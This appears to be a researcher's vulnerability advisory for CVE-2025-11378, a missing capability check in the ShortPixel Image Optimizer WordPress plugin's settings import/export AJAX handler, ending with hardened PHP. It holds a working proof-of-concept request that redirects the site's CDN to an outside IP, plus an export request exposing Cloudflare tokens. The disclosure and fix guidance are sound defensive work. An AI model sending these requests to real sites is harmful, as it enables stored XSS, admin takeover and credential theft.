ShortPixel Image Optimizer is a popular WordPress plugin (300k+ installs) for image compression and CDN delivery. During security testing, we identified CVE-2025-11378, an Improper Authorization flaw in the plugin’s settings import/export AJAX endpoint: it accepts a nonce obtainable by low-privileged users (e.g., Contributor+) but never enforces an admin-level capability such as manage_options. As a result, a low-privileged account can import arbitrary global settings (including enabling CDN and pointing CDNDomain to an attacker-controlled host) and export the full configuration, leading to admin-equivalent impact via Stored XSS and front-end defacement, as well as exposure of sensitive CDN/Cloudflare tokens that can be abused to compromise external infrastructure.
| Field | Value |
| --- | --- |
| CVE | CVE-2025-11378 |
| Plugin Version | ShortPixel Image Optimizer <= 6.3.4 |
| Criticality | High |
| All-time downloads | 17 773 050 |
| Active installations | 300 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11378 ; https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortpixel-image-optimiser/shortpixel-image-optimizer-634-authenticated-contributor-settings-importexport |
Timeline
| Date | Event |
| --- | --- |
| September 23, 2025 | Plugin testing and vulnerability detection in the ShortPixel Image Optimizer have been completed |
| September 23, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 22, 2025 | Registered CVE-2025-11378 |
Discovery of the Vulnerability
The issue surfaced during a white-box security review focused on ShortPixel’s AJAX surface and configuration handling. While mapping wp_ajax_* hooks, the shortpixel_ajaxRequest handler stood out because it multiplexes many internal actions via the screen_action and type parameters. Manual inspection of the corresponding callback for settings/importexport showed that it accepted both actionType=import and actionType=export without any explicit capability enforcement. Further testing confirmed that a Contributor user, after loading an admin screen such as post-new.php, received a valid nonce for shortpixel_ajaxRequest in the page source or inline script. Replaying that nonce in a crafted POST request to /wp-admin/admin-ajax.php with screen_action=settings/importexport&type=settings succeeded, both for importing arbitrary JSON and for exporting the complete serialized options. No additional checks limited this behavior to administrators. At that point it became clear that this was not merely overbroad functionality, but a systematic improper authorization flaw on a highly privileged settings surface, with a direct path to Stored XSS and configuration data exfiltration.
Understanding Missing Auth Attacks
Missing or improper authorization attacks on WordPress AJAX handlers typically arise when a developer relies only on a nonce for protection and neglects to verify user capabilities. A nonce in WordPress is primarily an anti-CSRF token and does not by itself express the user’s authorization level. If a nonce is exposed on pages available to Contributor or Author roles, then any functionality guarded solely by that nonce becomes accessible to those roles, even if conceptually intended for administrators. In this case, the shortpixel_ajaxRequest endpoint treats the nonce as if it were an authorization gate for settings import and export, but never calls current_user_can('manage_options') or a similar capability check before processing the request. Because the nonce is available on edit/post screens and other admin views reachable to non-admins, the effective precondition for calling the import/export code is just “is logged in and can load a page that prints this nonce,” which matches Contributor+. That is the core of the Missing Auth / Improper Authorization problem here: a high-impact, admin-grade operation (changing global CDN and optimization settings, exposing Cloudflare keys) is bound only to a CSRF token instead of a privilege level, so lower-privileged accounts can drive it directly. Once they can change CDN endpoints or inject attacker-controlled JavaScript paths, the blast radius escalates to stored XSS and full front-end compromise.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-11378, an attacker holding Contributor+ session cookies sends the following request (PoC):

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin: http://127.0.0.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Cookie_of_Contributor+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=shortpixel_ajaxRequest&nonce=nonce_from_http://127.0.0.1/wordpress/wp-admin/post-new.php_in_nonce_ajaxrequest&screen_action=settings/importexport&type=settings&actionType=import&importData={"useCDN":true,"cdn_js":true,"cdn_css":true,"CDNDomain":"http://91.103.253.40:8088"}
```

Alternatively, importData can carry a complete settings object, for example one that disables the plugin’s optimization and protection features:

```json
{"processThumbnails":false,"resizeImages":false,"backupImages":false,"CMYKtoRGBconversion":false,"createWebp":false,"createAvif":false,"deliverWebp":0,"optimizeRetina":false,"optimizeUnlisted":false,"optimizePdfs":false,"autoMediaLibrary":false,"doBackgroundProcess":false,"showCustomMedia":false,"useCDN":false,"cdn_js":false,"cdn_css":false,"enable_ai":false,"autoAI":false,"autoAIBulk":false,"ai_use_post":false,"ai_gen_alt":false,"ai_gen_caption":false,"ai_gen_description":false,"ai_gen_filename":false,"aiPreserve":false,"exif":0,"ai_general_context":"","ai_alt_context":"","ai_description_context":"","ai_caption_context":"","ai_filename_context":""}
```

Sensitive data exposure, including Cloudflare key exposure, uses the export branch with the same nonce and request headers:

```
action=shortpixel_ajaxRequest&nonce=19b5cf4c80&screen_action=settings/importexport&type=settings&actionType=export
```
Once this import succeeds, ShortPixel starts rewriting image, JS, and CSS URLs to the attacker’s domain. The attacker-hosted CDN can then serve trojanized JavaScript that runs on every front-end page load, achieving Stored XSS, session theft, admin takeover if an administrator visits the site, and visible defacement by altering CSS and layout. Alternatively, the attacker can perform a stealthier configuration tampering by disabling protection features, changing optimization behavior, or preparing more subtle payloads. For sensitive data exposure, the same Contributor account can use the nonce to call the export branch: screen_action=settings/importexport&type=settings&actionType=export. The plugin then returns a configuration blob that includes Cloudflare API tokens and other CDN or integration secrets. The attacker can exfiltrate this data and reuse those tokens to modify Cloudflare settings, hijack DNS or CDN configuration, or perform other actions against the victim’s infrastructure. All of this is possible without ever having administrator privileges; the only requirement is a low-privileged account that can see the nonce and send AJAX POSTs.
Recommendations for Improved Security
To mitigate this vulnerability, the settings import/export functionality must be strictly tied to administrator-level capabilities rather than just to a nonce. The handler behind shortpixel_ajaxRequest should, before processing any settings/importexport logic, enforce a clear capability check such as current_user_can('manage_options') and immediately wp_send_json_error() or wp_die() if the check fails. The nonce should remain as an anti-CSRF control but should never be used as the sole gatekeeper for privileged operations. In addition, the import path must validate that importData originates from a trusted context and should reject untrusted JSON supplied by low-privileged roles; for example, the plugin can restrict import to dedicated settings pages that only administrators can access. On the export side, the plugin should avoid returning raw secrets wherever possible. Cloudflare tokens and similar credentials should be stored and displayed in a redacted form and never included in generic “export settings” responses. If configuration export is necessary, sensitive fields should be excluded, masked, or encrypted, and only accessible to administrator roles. Finally, the vendor should audit all shortpixel_ajaxRequest branches and other AJAX/REST endpoints for consistent capability checks, ensure that nonces are treated strictly as CSRF defenses rather than authorization mechanisms, and add logging or alerts for settings import/export operations so that any future misuse can be detected and investigated quickly.
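As an added example (not ShortPixel’s code), this is how the settings/importexport branch described above can be hardened along the lines recommended: the nonce stays an anti-CSRF check, current_user_can('manage_options') becomes the authorization gate, secrets are redacted on export, imports are restricted to known keys, and every privileged operation is logged. The nonce action name, the option key and the secret field names are assumptions.

```php
<?php
// Added example (not ShortPixel's code): a hardened wp_ajax handler for the
// settings/importexport branch. Assumed: nonce action 'ajax_request', option key
// 'shortpixel_settings', and placeholder secret names in example_redact_secrets().
add_action( 'wp_ajax_shortpixel_ajaxRequest', 'example_shortpixel_ajax_request' );

function example_shortpixel_ajax_request() {
    // 1. The nonce is an anti-CSRF control only; it says nothing about privilege.
    check_ajax_referer( 'ajax_request', 'nonce' );
    $screen_action = sanitize_text_field( wp_unslash( $_POST['screen_action'] ?? '' ) );
    $action_type   = sanitize_text_field( wp_unslash( $_POST['actionType'] ?? '' ) );
    if ( 'settings/importexport' !== $screen_action ) {
        wp_send_json_error( array( 'message' => 'Unknown screen_action.' ), 400 );
    }
    // 2. Authorization: this branch reads or rewrites global settings, so it
    //    requires manage_options regardless of how the caller obtained the nonce.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }
    // 3. Audit trail: record who ran which privileged settings operation.
    error_log( sprintf( 'shortpixel settings %s by user %d', $action_type, get_current_user_id() ) );
    $settings = (array) get_option( 'shortpixel_settings', array() );
    if ( 'export' === $action_type ) {
        // Never return raw credentials in a generic export response.
        wp_send_json_success( example_redact_secrets( $settings ) );
    }
    if ( 'import' === $action_type ) {
        $data = json_decode( wp_unslash( $_POST['importData'] ?? '' ), true );
        if ( ! is_array( $data ) ) {
            wp_send_json_error( array( 'message' => 'importData is not a JSON object.' ), 400 );
        }
        // Keep only keys the plugin already knows, and require a public http(s) CDN URL.
        $data = array_intersect_key( $data, $settings );
        if ( isset( $data['CDNDomain'] ) && ! wp_http_validate_url( $data['CDNDomain'] ) ) {
            wp_send_json_error( array( 'message' => 'Invalid CDNDomain.' ), 400 );
        }
        update_option( 'shortpixel_settings', array_merge( $settings, $data ) );
        wp_send_json_success();
    }
    wp_send_json_error( array( 'message' => 'Unknown actionType.' ), 400 );
}

function example_redact_secrets( array $settings ) {
    foreach ( array( 'cloudflareToken', 'cloudflareKey', 'apiKey' ) as $key ) { // assumed key names
        if ( ! empty( $settings[ $key ] ) ) {
            $settings[ $key ] = '[redacted]';
        }
    }
    return $settings;
}
```

With this ordering a Contributor who replays a valid nonce receives a 403 before any import or export logic runs, and the error_log line gives defenders a record of who attempted the operation.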
By taking proactive measures to address Missing Auth vulnerabilities like CVE-2025-11378, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.
